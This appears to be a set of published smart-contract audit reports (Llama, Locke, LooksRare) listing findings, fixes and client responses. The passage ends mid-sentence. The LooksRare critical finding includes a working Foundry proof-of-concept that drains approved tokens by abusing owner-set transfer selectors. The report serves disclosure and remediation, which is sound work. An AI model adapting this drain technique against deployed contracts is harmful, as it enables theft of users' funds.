LlamaCore.sol#L620, LlamaCore.sol#L460, LlamaCore.sol#L403 Description: The domainSeperator is computed for each use. Some gas may be saved by using caching and deferring to the cached value. Recommendation: Consider using one of OpenZeppelin or Solady which are both project dependencies. Llama: The domain separator would be cached as immutable in the case of using the OpenZeppelin library. But in Llama's case, all the Llama Cores are minimal proxies which would each need their own domain separators. Spearbit: Acknowledged. 18 5.6 Informational +5.6.1 Prefer on-chain SVGs or IPFS links over server links for contractURI Severity: Informational Context: LlamaPolicyMetadata.sol#L97 Description: Llama uses on-chain SVG for LlamaPolicy.tokenURI. The same could be implemented for LlamaPolicy.contractURI as well. In general IPFS links or on-chain SVG for visual representations provide better properties than centralized server links. Recommendation: Change hardcoded URLs in contractURI to SVG's or an IPFS link. Llama: These images are only used by NFT marketplace frontends and are cached anyway by their CDNs. We lean towards leaving it to preserve the flexibility if the logo changes in the future. Spearbit: Acknowledged. +5.6.2 Consider making the delegate-call scripts functions only callable by delegate-call Severity: Informational Context: GovernanceScript.sol#L63 Description: An additional safety check could be added to scripts if a function should be only callable via a delegate-call. Recommendation: The following modifier could be added to delegate-call only script functions. address public immutable SELF; constructor () { SELF = address(this); } modifier onlyDelegateCall { require(address(this) != SELF); _; } Llama: Fixed in commit 5834a2. Spearbit: Resolved. +5.6.3 Missing tests for SingleUseScript.sol Severity: Informational Context: SingleUseScript.sol#L10 Description: There are no tests for SingleUseScript.sol in Llama. Recommendation: Each contract used for Llama should be tested with high coverage. Llama: Fixed in PR 331. Spearbit: Resolved. 19 +5.6.4 Role not available to Guards Severity: Informational Context: Structs.sol#L29-L36, ILlamaStrategy.sol#L14 Description: Use cases where Guards require knowing the creation or approval role for the action are not sup- ported. ActionInfo does reference the strategy, and the two implemented strategies do have public functions referencing the approvalRole, allowing for a workaround. However, this is not mandated by the ILlamaStrategy interface and is not guaranteed to be present in future strategies. Recommendation: Consider exposing role to guards. Llama: Action creation role was added to the ActionInfo struct in PR 281. If a guard wanted the (dis)approval role it could try querying the strategy (there's no guarantee that the strategy has the approval or disapproval role exposed, however, both strategies currently implemented do). Spearbit: Resolved. +5.6.5 Global guards are not supported Severity: Informational Context: LlamaCore.sol#L146 Description: Other protocols use of guards applies them to the account (i.e. globally). In other words, if global guards existed and if there are some properties you know to apply to the entire LlamaCore instance a global guard could be applied. The current implementation allows granular control, but it also requires granular control with no ability to set global guards. Recommendation: Note in docs and/or consider if global guards are desirable. Llama: We explicitly avoided global guards to reduce the risk of unintended consequences. If users want to gen- eralize their guards they can accomplish that by using a script as an abstraction layer on administrative functions and guard that script. Spearbit: Acknowledged. +5.6.6 Consider using _disableInitializers in constructor Severity: Informational Context: LlamaCore.sol#L152 Description: OpenZeppelin added the _disableInitializers() in 4.6.0 which prevents initialization of the im- plementation contract and recommends its use. Recommendation: Remove the initializer modifier from the constructor and add _disableInitializers() in the constructor body. Llama: Resolved in commit e3da48 and PR 293. Spearbit: Resolved. 20 +5.6.7 Consider renaming initialAccounts to initialAccountNames for clarity Severity: Informational Context: LlamaCore.sol#L168 Description: Consider renaming initialAccounts to initialAccountNames for clarity. The more verbose argu- ment name makes it clear what to pass as input. Llama: Resolved by commit 5f3d2c and PR 313. Spearbit: Resolved. +5.6.8 Revoking and setting a role edge cases Severity: Informational Context: LlamaPolicy.sol#LL158C12-L158C25, /LlamaPolicy.sol#L180 Description: This issue highlights a number of edge-case behaviors 1. Calling setRoleHolder passing in an account with balanceOf == 0, 0 quantity, and 0 expiration results in minting the NFT. 2. Revoking all policies through revokeExpiredRole leaves an address with no roles except for the ALL_- HOLDERS_ROLE and a balanceOf == 1. 3. Revoking may be conducted on policies the address does not have (building on the previous scenario): • Alice is given role 1 with expiry. • Expiry passes. • Anyone calls revokeExpiredRole. • Role is revoked but Alice still has balanceOf == 1. • LlamaCore later calls revokePolicy with roles array of [2]. • A role Alice never had is revoked. • The NFT is burned. Recommendation: Document the edge cases and the recommended means of revoking. Llama: Acknowledged 1 & 2 as this is intentional behavior to allow minting an account a policy that only has the ALL_HOLDERS_ROLE, and resolved 3 with commit 68538b and PR 318. Spearbit: Acknowledged. +5.6.9 Use built in string.concat Severity: Informational Context: LlamaPolicyMetadata.sol#L99-L100 LlamaPolicyMetadata.sol#L48, LlamaPolicyMetadata.sol#L63-L66, LlamaPolicyMetadata.sol#L85, Description: The solidity version used has a built-in string.concat which can replace the instances of string(abi.encodePacked(...). The client notes there are no gas implications of this change while the change does offer semantic clarity. Recommendation: Use built in string.concat. Llama: Fixed in commit c305ce. Spearbit: Resolved. 21 +5.6.10 Inconsistencies Severity: Informational Context: Description: Throughout the codebase, we've encountered some inconsistencies that we decided to point out. for(uint256 i = 0... is not used everywhere e.g. AbsoluteStrategy.sol#L130 • Sometimes, a returned value is not named. e.g. named return value function createAction( uint8 role, ILlamaStrategy strategy, address target, uint256 value, bytes calldata data, string memory description ) external returns (uint256 actionId) { unnamed return value function createActionBySig( uint8 role, ILlamaStrategy strategy, address target, uint256 value, bytes calldata data, address policyholder, uint8 v, bytes32 r, bytes32 s ) external returns (uint256) { • Missing NatSpec on various functions. e.g. LlamaPolicy.sol#L102 • _uncheckedIncrement is not used everywhere. • Naming of modifiers In all contracts the onlyLlama modfiier only refers to the llamaCore. The only exception is LlamaPolicyMetadataParamRegistry which has the same name but refers to llamaCore and rootLlama but is called onlyLlama. See LlamaPolicyMetadataParamRegistry.sol#L16 • Console.log debug output in RelativeStrategy console.log in RelativeStrategy See: RelativeStrat- egy.sol#L215 • In GovernanceScript.sol both of SetRolePermission and SetRoleHolder mirror structs defined in the shared lib/Structs.sol file. Additionally, some contracts declare their own structs over inheriting all structs from lib/Structs.sol: • LlamaAccount • GovernanceScript • LlamaPolicy Recommend removing duplicate structs and, where relevant, continue making use of the shared Structs.sol for struct definitions. Recommendation: Consider keeping the code consistent for a better readability Llama: PR 321 fixed with the following notes: • We've chosen not to consistently use named or unnamed returns. We think named returns are useful in certain contexts but not always necessary. • We've updated the NatSpec for all contracts in PR 349. 22 • Modifier naming and the leftover console.log statement were addressed in these two PRs respectively: PR 279 and PR 277. • We chose to remove duplicate structs, but only make use of the shared Structs.sol for structs that appear in more than one file in the src directory. For structs that appear in a single file we're ok with declaring them in that file. Spearbit: Resolved. +5.6.11 Policyholders with large quantities may not both create and exercise their large quantity for the same action Severity: Informational Context: AbsoluteStrategy.sol#L178 Description: The AbsoluteStrategy removes the action creator from the set of policyholders who may approve / disapprove an action. This is a departure from how the RelativeStrategy handles action creators. Not permitting action creators to approve / disapprove is simple to reason about when each policyholder has a quantity of 1; creating can even be thought of an implicit approval and may be factored in when choosing a minApprovals value. However, in scenarios where a policyholder has a large quantity (in effect a large weight to their casted approval), creating an action means they forfeit the use of the vast majority of their quantity for that particular action. Recommendation: For the strategy as is, emphasize the behavior in documentation so that action creators are not surprised by the loss of influence. A code based solution would be to consider adding a strategy that allows the creator's quantity to count as casting approval. Documenting the difference between a strategy like this and the current AbsoluteStrategy would be important. Finally, without modifications to the codebase, the issue may be circumvented by asking policyholders with large quantities to provide two addresses, one for exercising their large quantity and a second for creating actions. Assigning both addresses the same role, with appropriate quantities, would allow the policyholder to both create an action and exercise their large quantity. Llama: A new strategy has been added called AbsoluteQuorum. The old AbsoluteStrategy has been split into 2 contracts AbsoluteStrategyBase and PeerReview. Fixed in PR 345. Spearbit: Resolved. +5.6.12 The roleBalanceCheckpoints can run out of gas Severity: Informational Context: LlamaPolicy.sol#L244-L246 Description: The roleBalanceCheckpoints function returns the Checkpoints history of a balance. This check will copy into memory the whole history which can end up in a out of gas error. This is an informational issue as this function was designed for off-chain usage and the caller can use eth_call with a higher gas limit. Recommendation: Consider adding a paginated version of this function, furthermore, consider adding an extra function that returns the length of the _checkpoints. Llama: Fixed in commit e055e9 and PR 310. Spearbit: Resolved. 23 +5.6.13 GovernanceScript.revokeExpiredRoles should be avoided in favor of calling LlamaPol- icy.revokeExpiredRole from EOA Severity: Informational Context: GovernanceScript.sol#L211 Description: GovernanceScript.revokeExpiredRoles is intended to be delagate called from LlamaCore. Given that LlamaPolicy.revokeExpiredRole is already public and without access controls, it will always be cheaper, and less complex, to call directly from an EOA or batching a multicall, again from an EOA. Recommendation: Prefer calling LlamaPolicy.revokeExpiredRole directly or via multicall over using Gover- nanceScript.revokeExpiredRoles. Llama: Resolved with commit 2e4de6. Spearbit: Resolved. +5.6.14 The InvalidActionState can be improved Severity: Informational Context: LlamaCore.sol#L281, LlamaCore.sol#L295 Description: Currently, the InvalidActionState includes the expected state as an argument, this is unnecessary as you can derive the state from the method call, would make more sense to take the current state instead of the expected state. Recommendation: Consider adding the current state to the revert error instead of the expected state. Llama: Fixed in commit 5fa77c and PR 311. Spearbit: Resolved. +5.6.15 _uncheckedIncrement function written in multiple contracts Severity: Informational Context: LlamaCore.sol#L771, LlamaFactory.sol#L243, LlamaAccount.sol#L284, LlamaPolicy.sol#L432, Rela- tiveStrategy.sol#L287, AbsoluteStrategy.sol#L285 Description: Multiple contracts make use of an _uncheckedIncrementfunction and each duplicates the function definition. Similarly the slot0 function appears in both LlamaAccount and LlamaCore and _toUint64 appears in the two strategy contracts plus LlamaCore. Recommendation: Move shared functions to a local lib to DRY out the codebase. Llama: Resolved by commit 0a0aa4. Spearbit: Resolved. 24 diff --git a/findings_newupdate/spearbit/Locke-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Locke-Spearbit-Security-Review.txt new file mode 100644 index 0000000..65be6d5 --- /dev/null +++ b/findings_newupdate/spearbit/Locke-Spearbit-Security-Review.txt @@ -0,0 +1,20 @@ +5.1.1 UnaccruedSeconds do not increase even if nobody is actively staking Severity: High Risk Context: Lock.sol.sol#L180 Description: The unstreamed variable tracks whether someone is staking in the contract or not. However, because of the division precision loss at Locke.sol#L164-L166 and Locke.sol#L187, unstreamed > 0 may happen even when everyone has already withdrawn all deposited tokens from the contract, i.e. ts.token = 0 for everyone. Consider the following proof of concept with only two users, Alice and Bob: • streamDuration = 8888 • At t = startTime, Alice stakes 1052 wei of deposit tokens. • At t = startTime + 99, Bob stakes 6733 wei of deposit tokens. • At t = startTime + 36, both Alice and Bob exits from the contract. At this point Alice’s and Bob’s ts.tokens are both 0 but unstreamed = 1 wei. The abovementined numbers are the resault of a fuzzing campaign and were not carefully crafted, therefore this issue can also occur under normal circumstances. function updateStreamInternal() internal { ... uint256 tdelta = timestamp - lastUpdate; if (tdelta > 0) { if (unstreamed == 0) { unaccruedSeconds += uint32(tdelta); } else { unstreamed -= uint112(tdelta * unstreamed / (endStream - lastUpdate)); } } ... } Recommendation: Consider using totalVirtualBalance == 0 instead of unstreamed == 0 +5.1.2 Old governor can call acceptGov() after renouncing its role through _abdicate() Severity: High Risk Context: Gov.sol#L30 Description: The __abdicate function does not reset pendingGov value to 0. Therefore, if a pending governor is set the user can become a governor by calling acceptGov. Recommendation: Consider setting pendinGov to address(0) inside the __abdicate function. function __abdicate() governed external override { address old = gov; gov = address(0); pendingGov = address(0); emit NewGov(old, address(0)); + } 9 +5.1.3 User can lose their reward due truncated division Severity: High Risk Context: Locke.sol#L321 Description: The truncated division can cause users to lose rewards in this update round which may happen when any of the following conditions are true: 1. RewardToken.decimals() is too low. 2. Reward is updated too frequently. 3. StreamDuration is too large. 4. TotalVirtualBalance is too large (e.g., stake near the end of stream). This could potentially happen especially when the 1st case is true. Consider the following scenario: • rewardToken.decimals() = 6. • depositToken.decimals() can be any (assume it’s 18). • rewardTokenAmount = 1K * 10**6. • streamDuration = 1209600 (two weeks). • totalVirtualBalance = streamDuration * depositTokenAmount / timeRemaining where depositToken- Amount = 100K 10**18 and timeRemaining = streamDuration (a user stakes 100K at the beginning of the stream) lastApplicableTime() - lastUpdate = 100 (about 7 block-time). Then rewards = 100 * 1000 * 10**6 * 10**18 / 1209600 / (1209600 * 100000 * 10**18 / 1209600) = 0.8267 < 1. User wants to buy the reward token at the price of 100K/1K = 100 deposit token but does not get any because of the truncated division. function rewardPerToken() public override view returns (uint256) { if (totalVirtualBalance == 0) { return cumulativeRewardPerToken; } else { // time*rewardTokensPerSecond*oneDepositToken / totalVirtualBalance uint256 rewards; unchecked { rewards = (uint256(lastApplicableTime() - lastUpdate) * rewardTokenAmount * ,! depositDecimalsOne) / streamDuration / totalVirtualBalance; } return cumulativeRewardPerToken + rewards; } } Recommendation: Consider scaling up cumulativeRewardPerToken and users reward. 10 5.2 Medium Risk +5.2.1 The streamAmt check may prolong a user in the stream Severity: Medium Risk Context: Locke.sol#L165 Description: Assume that the amount of tokens staked by a user (ts.tokens) is low. This check allows another person to deposit a large stake in order to prolong the user in a stream (untilstreamAmt for the user becomes non-zero). For this duration the user would be receiving a bad rate or 0 altogether for the reward token while being unable to exit from the pool. if (streamAmt == 0) revert ZeroAmount(); Therefore, if Alice stakes a small amount of deposit token and Bob comes along and deposits a very large amount of deposit token, tt’s in Alice’s interest to exit the pool as early as possible especially when this is an indefinite stream. Otherwise the user would be receiving a bad rate for their deposit token. Recommendation: The ideal scenario is if streamAmt ends up being zero for a certain accTimeDelta, the user should be able to exit the pool with ts.tokens as long as they don’t receive rewards for the same duration. However, in practice, implementing this may create issues related to unaccured seconds. +5.2.2 User can stake before the stream creator produced a funding stream Severity: Medium Risk Context: Locke.sol#410 Description: Consider the following scenario: 1. Alice stakes in a stream before the stream starts. 2. Nobody funds the stream,. 3. In case of an indefinite stream Alice loses some of her deposit depending on when she exits the stream. For a usual stream Alice will have her deposit tokens locked until endDepositLock. Recommendation: Two mitigatations are possible: 1. A frontend check warning the user if a stream does not have any reward tokens. 2. A check in the stake function which would revert when rewardTokenAmount == 0. +5.2.3 Potential funds locked due low token decimal and long stream duration Severity: Medium Risk Context: Locke.sol#L166 Description: In case where the deposit token decimal is too low (4 or less) or when the remaining stream duration is too long, checking streamAmt > 0 may affect regular users. They could be temporarily blocked by the contract, i.e. they cannot stake, withdraw, or get rewards, and should wait until streamAmt > 0 or the stream ends. Altough unlikely to happen it still is a potential lock of funds issue. 11 function updateStreamInternal() internal { ... if (acctTimeDelta > 0) { if (ts.tokens > 0) { uint112 streamAmt = uint112(uint256(acctTimeDelta) * ts.tokens / (endStream - ,! ts.lastUpdate)); if (streamAmt == 0) revert ZeroAmount(); ts.tokens -= streamAmt; } ... } Recommendation: Consider scaling ts.tokens to 18 decimals of precision for internal accounting. 5.3 Low Risk +5.3.1 Sanity check on the reward token’s decimals Severity: Low Risk Context: Locke.sol#L262 Description: Add sanity check on the reward token’s decimals, which shouldn’t exceed 33 because Token- Stream.rewards has a uint112 type. constructor( ) { uint64 _streamId, address creator, bool _isIndefinite, address _rewardToken, address _depositToken, uint32 _startTime, uint32 _streamDuration, uint32 _depositLockDuration, uint32 _rewardLockDuration, uint16 _feePercent, bool _feeEnabled LockeERC20( _depositToken, _streamId, _startTime + _streamDuration + _depositLockDuration, _startTime + _streamDuration, _isIndefinite ) MinimallyExternallyGoverned(msg.sender) // inherit factory governance // No error code or msg to reduce bytecode size require(_rewardToken != _depositToken); // set fee info feePercent = _feePercent; feeEnabled = _feeEnabled; // limit feePercent require(feePercent < 10000); // store streamParams startTime = _startTime; streamDuration = _streamDuration; // set in shared state 12 endStream = startTime + streamDuration; endDepositLock = endStream + _depositLockDuration; endRewardLock = startTime + _rewardLockDuration; // set tokens depositToken = _depositToken; rewardToken = _rewardToken; // set streamId streamId = _streamId; // set indefinite info isIndefinite = _isIndefinite; streamCreator = creator; uint256 one = ERC20(depositToken).decimals(); if (one > 33) revert BadERC20Interaction(); depositDecimalsOne = uint112(10**one); // set lastUpdate to startTime to reduce codesize and first users gas lastUpdate = startTime; } Recommendation: Consider adding sanity checks on the reward token’s decimals. +5.3.2 Use a stricter bound for transferability delay Severity: Low Risk Context: LockeErc20.sol#L177 Description: modifier transferabilityDelay { // ensure the time is after end stream if (block.timestamp < endStream) revert NotTransferableYet(); _; } Recommendation: Consider using <= insted of < so that it can cover time up to endStream. block.timestamp <= endStream +5.3.3 Potential issue with malicious stream creator Severity: Low Risk Context: Locke.sol#L307 Description: Assume that users staked tokens at the beginning. The malicious stream creator could come and stake an extremely large amount of tokens thus driving up the value of totalVirtualBalance. This means that users will barely receive rewards while giving away deposit tokens at the same rate. Users can exit the pool in this case to save their unstreamed tokens. 13 function rewardPerToken() public override view returns (uint256) { if (totalVirtualBalance == 0) { return cumulativeRewardPerToken; } else { unchecked { rewards = (uint256(lastApplicableTime() - lastUpdate) * rewardTokenAmount * ,! depositDecimalsOne) / streamDuration / totalVirtualBalance; } return cumulativeRewardPerToken + rewards; } } Recommendation: Consider constant stream monitoring. +5.3.4 Users may exit the pool at a small duration before endStream to save tokens Severity: Low Risk Context: Locke.sol#L164 Description: Given a time t, that is very close to endStream and a time period $\Delta t$, assume that rewards for a particular user during this period is 0. Since the amount of deposit token streamed is inversely proportional to the time that is left, i.e. more deposit tokens are exchanged during a time period that is closer to the end of the stream rather than at the beginning of the stream, it is likely that the deposit token sold during $\Delta t$ is non-zero. A user can use this information to exit the stream just before endStream. In this process the user prevents some of their tokens from streaming while receiving no rewards for this duration! Suppose that there is a stream and two tokens testTokenB and testTokenA, where testTokenA is the reward token and testTokenB is the deposit token. Assume that the following conditions are true: assert(testTokenB.balanceOf(alice) == 200); assert(testTokenB.balanceOf(bob) == 100); assert(testTokenA.balanceOf(alice) == 0); assert(testTokenA.balanceOf(bob) == 0); Using the testing conventions from the repository, consider the following stream instance: 14 function test_equality_withdraw() public { testTokenA.approve(address(stream), 1000); stream.fundStream(1000); vm.startPrank(alice); testTokenB.approve(address(stream), 200); stream.stake(200); vm.stopPrank(); vm.startPrank(bob); testTokenB.approve(address(stream), 100); stream.stake(100); vm.warp(endStream - 1); stream.exit(); vm.stopPrank(); vm.warp(endStream + 1); vm.prank(alice); stream.claimReward(); vm.prank(bob); stream.claimReward(); } The above code results in the following assertions to be true after the test: assertEq(testTokenA.balanceOf(alice), 666); assertEq(testTokenA.balanceOf(bob), 333); assertEq(testTokenB.balanceOf(alice), 0); assertEq(testTokenB.balanceOf(bob), 1); The same assertions are true even if Bob does not exit from the stream. In case of an indefinite stream Bob would be able save some of his tokens from being sold. In the desired case Bob prevents some of his tokens from being locked up until endDepositLock is finished, both work in Bob’s favor. 5.4 Gas Optimization +5.4.1 Moving check require(feePercent < 10000) in updateFeeParams to save gas Severity: Gas Optimization Context: Locke.sol#L237 Description: feePercent comes directly from LockeFactory’s feeParams.feePercent, which is configured in the updateFeeParams function and used across all Stream contracts. Moving this check into the updateFeeParams function can avoid checking in every contract and thus save gas. Recommendation: Consider moving the check in the updateFeeParams function. 15 +5.4.2 Use calldata instead of memory for some function parameters Severity: Gas Optimization Context: MerkleLocke.sol#L10, MerkleLocke.sol#L17 and MerkleLocke.sol#L75 Description: Having function arguments in calldata instead of memory is more optimal in the aforementioned cases. See the following reference. Recommendation: Consider using calldata instead of memory. +5.4.3 Update cumulativeRewardPerToken only once after stream ends Severity: Gas Optimization Context: Locke.sol#597 Description: Since cumulativeRewardPerToken does not change once it is updated after the stream ends, it has to be updated only once. Recommendation: Consider changing the code as follows: - cumulativeRewardPerToken = rewardPerToken(); + if (lastUpdate < endStream) { + + } cumulativeRewardPerToken = rewardPerToken(); +5.4.4 Expression 10**one can be unchecked Severity: Gas Optimization Context: Locke.sol#263 Description: uint256 one = ERC20(depositToken).decimals(); if (one > 33) revert BadERC20Interaction(); depositDecimalsOne = uint112(10**one) Recommendation: The following recommendation would perform checked exponentiation which is not that bad and just checks if one > 77 and the revert, otherwise it uses exp(10, one). unchecked { depositDecimalsOne = uint112(10**one) }; +5.4.5 Calculation of amt can be unchecked Severity: Gas Optimization Context: Locke.sol#L536 Description: The value newBal in this context is always greater than prevBal because of the check located at Locke.sol#534. Therefore, we can use unchecked subtraction. Recommendation: - + + uint112 amt = uint112(newBal - prevBal); uint112 amt; unchecked { amt = uint112(newBal - prevBal); } 16 +5.4.6 Change lastApplicableTime() to endStream Severity: Gas Optimization Context: Locke.sol#L610, Locke.sol#L615, Locke.sol#L642, and Locke.sol#L639. Description: Since block.timestamp >= endStream in the abovementioned cases the lastApplicableTime function will always return endStream. Recommendation: Change lastApplicableTime() to endStream to save gas. 5.5 Informational +5.5.1 Unused variable _ret Severity: Informational Context: Locke.sol#L812 Recommendation: Unused variable _ret can be either removed or forwarded in case of an error. +5.5.2 Simplifying code logic Severity: Informational Context: LockeLens.sol#L26-L37 Description: if (timestamp < lastUpdate) { return tokens; } uint32 acctTimeDelta = timestamp - lastUpdate; if (acctTimeDelta > 0) { uint256 streamAmt = uint256(acctTimeDelta) * tokens / (endStream - lastUpdate); return tokens - uint112(streamAmt); } else { return tokens; } 17 function currDepositTokensNotYetStreamed(IStream stream, address who) external view returns (uint256) { unchecked { uint32 timestamp = uint32(block.timestamp); (uint32 startTime, uint32 endStream, ,) = stream.streamParams(); if (block.timestamp >= endStream) return 0; ( uint256 lastCumulativeRewardPerToken, uint256 virtualBalance, uint112 rewards, uint112 tokens, uint32 lastUpdate, bool merkleAccess ) = stream.tokenStreamForAccount(address(who)); if (timestamp < lastUpdate) { return tokens; } uint32 acctTimeDelta = timestamp - lastUpdate; if (acctTimeDelta > 0) { uint256 streamAmt = uint256(acctTimeDelta) * tokens / (endStream - lastUpdate); return tokens - uint112(streamAmt); } else { return tokens; } } } Recommendation: The above code can be optimized as follows: if (timestamp <= lastUpdate) { return tokens; } uint32 acctTimeDelta = timestamp - lastUpdate; uint256 streamAmt = uint256(acctTimeDelta) * tokens / (endStream - lastUpdate); return tokens - uint112(streamAmt); +5.5.3 Unsused parameter _emergency_governor in constructor Severity: Informational Context: LockeFactory.sol#L29 Recommendation: Remove the unused parameter _emergency_governor from the constructor argument. 18 +5.5.4 Unused Imports Severity: Informational Context: Locke.sol#L6 and SharedState.sol#L3 Recommendation: Remove the aforementioned imports. 19 diff --git a/findings_newupdate/spearbit/LooksRare-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/LooksRare-Spearbit-Security-Review.txt new file mode 100644 index 0000000..24320be --- /dev/null +++ b/findings_newupdate/spearbit/LooksRare-Spearbit-Security-Review.txt @@ -0,0 +1,68 @@ +5.1.1 The Protocol owner can drain users' currency tokens Severity: Critical Risk Context: • LooksRareProtocol.sol#L138 • LooksRareProtocol.sol#L391-L398 • ITransferSelectorNFT.sol#L14-L17 • TransferSelectorNFT.sol#L41 • TransferSelectorNFT.sol#L89-L98 Description: The Protocol owner can drain users' currency tokens that have been approved to the protocol. Makers who want to bid on NFTs would need to approve their currency token to be spent by the protocol. The owner should not be able to access these funds for free. The owner can drain the funds as follows: 1. Calls addTransferManagerForAssetType and assigns the currency token as the transferManagerForAs- setType and IERC20.transferFrom.selector as the selectorForAssetType for a new assetType. 2. Signs an almost empty MakerAsk order and sets its collection as the address of the targeted user and the assetType to the newly created assetType. The owner also creates the corresponding TakerBid by setting the recipient field to the amount of currency they would like to transfer. 3. Calls the executeTakerBid endpoint with the above data without a merkleTree or affiliate. // file: test/foundry/Attack.t.sol pragma solidity 0.8.17; import {IStrategyManager} from "../../contracts/interfaces/IStrategyManager.sol"; import {IBaseStrategy} from "../../contracts/interfaces/IBaseStrategy.sol"; import {OrderStructs} from "../../contracts/libraries/OrderStructs.sol"; import {ProtocolBase} from "./ProtocolBase.t.sol"; import {MockERC20} from "../mock/MockERC20.sol"; contract NullStrategy is IBaseStrategy { function isLooksRareV2Strategy() external pure override returns (bool) { return true; } function executeNull( OrderStructs.TakerBid calldata /* takerBid */ , OrderStructs.MakerAsk calldata /* makerAsk */ ) external pure returns ( uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool isNonceInvalidated ) {} } 5 contract AttackTest is ProtocolBase { NullStrategy private nullStrategy; MockERC20 private mockERC20; uint256 private signingOwnerPK = 42; address private signingOwner = vm.addr(signingOwnerPK); address private victimUser = address(505); function setUp() public override { super.setUp(); vm.startPrank(_owner); looksRareProtocol.initiateOwnershipTransfer(signingOwner); // This particular strategy is not a requirement of the exploit. nullStrategy = new NullStrategy(); looksRareProtocol.addStrategy( 0, 0, 0, NullStrategy.executeNull.selector, false, address(nullStrategy) ); mockERC20 = new MockERC20(); looksRareProtocol.updateCurrencyWhitelistStatus(address(mockERC20), true); looksRareProtocol.updateCreatorFeeManager(address(0)); mockERC20.mint(victimUser, 1000); vm.stopPrank(); vm.prank(signingOwner); looksRareProtocol.confirmOwnershipTransfer(); } function testDrain() public { vm.prank(victimUser); mockERC20.approve(address(looksRareProtocol), 1000); vm.startPrank(signingOwner); looksRareProtocol.addTransferManagerForAssetType( 2, address(mockERC20), mockERC20.transferFrom.selector ); OrderStructs.MakerAsk memory makerAsk = _createSingleItemMakerAskOrder({ // null strategy askNonce: 0, subsetNonce: 0, strategyId: 1, assetType: 2, // ERC20 asset! orderNonce: 0, collection: victimUser, // <--- will be used as the `from` currency: address(0), signer: signingOwner, minPrice: 0, itemId: 1 }); 6 bytes memory signature = _signMakerAsk(makerAsk, signingOwnerPK); OrderStructs.TakerBid memory takerBid = OrderStructs.TakerBid( address(1000), // `amount` field for the `transferFrom` 0, makerAsk.itemIds, makerAsk.amounts, bytes("") ); looksRareProtocol.executeTakerBid( takerBid, makerAsk, signature, _EMPTY_MERKLE_TREE, _EMPTY_AFFILIATE ); vm.stopPrank(); assertEq(mockERC20.balanceOf(signingOwner), 1000); assertEq(mockERC20.balanceOf(victimUser), 0); } } Recommendation: It would be best to fix the selector instead of the protocol owner being able to assign arbi- trary selectors for managerSelectorOfAssetType[assetType]. This can be done by requiring all selected transfer managers to adhere to the same interface which defines the following endpoint: interface ITransferManager { ... function executeTransfer( address collection, address from, address to, uint256[] calldata itemIds, uint256[] calldata amounts ) } The endpoint name executeTransfer above should be chosen to avoid selector collision with potential currencies that will be allowed for the protocol (IERC20 tokens or even all the endpoint selectors involved in the protocol). The call in _transferNFT can be changed to: (bool status, ) = ITransferManager(transferManager).executeTransfer( collection, sender, recipient, itemIds, amounts ); and managerSelectorOfAssetType's type can be changed to: mapping(uint256 => address) public managerSelectorOfAssetType; The above change also has the benefit of reducing gas costs. LooksRare: The ability to add new transfer managers and selectors for new asset types has been removed. Also the transfer manager for ERC721 and ERC1155 assets gets assigned to an immutable variable upon deployment. 7 Fixed in PR 308 and PR 363. Spearbit: Verified 5.2 Medium Risk +5.2.1 StrategyFloorFromChainlink will often revert due to stale prices Severity: Medium Risk Context: StrategyFloorFromChainlink.sol Description: The FloorFromChainlink strategy inherits from BaseStrategyChainlinkPriceLatency, so it can have a maxLatency of at most 3600 seconds. However, all of the chainlink mainnet floor price feeds have a heartbeat of 86400 seconds (24 hours), so the chainlink strategies will revert with the PriceNotRecentEnough error quite often. At the time of writing, every single mainnet floor price feed has an updateAt timestamp well over 3600 seconds in the past, meaning the strategy would always revert for any mainnet price feed right now. This may have not been realized earlier because the Goerli floor price feeds do have a heartbeat of 3600, but the mainnet heartbeat is much less frequent. One of the consequences is that users might miss out on exchanges they would have accepted. For example, if a taker bid is interested in a maker ask with an eth premium from the floor, in the likely scenario where the taker didn't log-in within 1 hour of the last oracle update, the strategy will revert and the exchange won't happen even though both parties are willing. If the floor moves up again the taker might not be interested anymore. The maker will have lost out on making a premium from the floor, and the taker would have lost out on the exchange they were willing to make. Recommendation: For the FloorFromChainlink strategy, allow for a maxLatency value of 86400, instead of restricting at 3600. LooksRare: Fixed in PR 326. Spearbit: Verified. 5.3 Low Risk +5.3.1 minPrice and maxPrice should reflect the allowed regions for the funds to be transferred from the bidder to the ask recipient Severity: Low Risk Context: • ExecutionManager.sol#L157-L167 • ExecutionManager.sol#L243-L253 Description: 1. When a maker or taker sets a minPrice for an ask, the protocol should guarantee the funds they receive is at minimum the minPrice amount (currently not enforced). 2. Also reversely, when a maker or taker sets a maxPrice for a bid, the protocol should guarantee that the amount they spend is at maximum maxPrice (currently enforced). For 1. the current protocol-controlled deviation can be 30% maximum (sum of fees sent to the creator, the protocol fee recipient, and an affiliate). Recommendation: One can enforce both of the above points by making sure strategies only require minPrice <= maxPrice (they would not need to be equal in general for each strategy, and can be indirectly enforced at the protocol level). Related issue: "price validation in executeStrategyWithTakerAsk, executeCollectionStrate- gyWithTakerAsk and executeCollectionStrategyWithTakerAskWithProof can be relaxed" Changes required for taker bid strategies: 8 • Common changes for all strategies: the takerBid.maxPrice needs to be compared to the sum of the price returned by the strategy and the fees that would need to be sent to the creator, protocol fee recipient, and an affiliate (takerBid.maxPrice >= sum). Note that in this case fees are not deducted from the price but added, and the taker is responsible to pay all those fees, but has the takerBid.maxPrice as a guard so that they don't end up paying more than what they had set. This would also allow the maker to receive the full amount of the fund/price set by their chosen strategy. • InheritedStrategy: iszero(eq(price, counterpartyPrice))) needs to be taken out of this shared logic between taker bid and ask executions. The strategy chooses makerAsk.minPrice as the strategies price which is correct since we also need to make sure the price returned by the strategy which is what the maker would receive is at least makerAsk.minPrice. • StrategyDutchAuction: if (takerBid.maxPrice < price) needs to be removed as the common re- quired change would cover this. Also, this strategy picks the price in a way that it is not less than mak- erAsk.minPrice. • StrategyUSDDynamicAsk: if (takerBid.maxPrice < price) needs to be removed as the common re- quired change would cover this. Also, this strategy picks the price in a way that it is not less than mak- erAsk.minPrice. • StrategyFloorFromChainlink.execute...PremiumStrategyWithTakerBid: if (takerBid.maxPrice < price) (2) needs to be removed as the common required change would cover this. Also, this strategy picks the price in a way that it is not less than makerAsk.minPrice. In a nutshell, remove the above-mentioned checks for takerBid.maxPrice from individual strategies and instead apply a similar check at the protocol level that also includes the extra fees. The following if (fees[1] == 0) { // If creator fee is null, protocol fee is set as the minimum total fee amount fees[0] = minTotalFeeAmount; // Net fee amount for seller fees[2] = price - fees[0]; } else { // If there is a creator fee information, the protocol fee amount can be calculated fees[0] = _calculateProtocolFeeAmount(price, 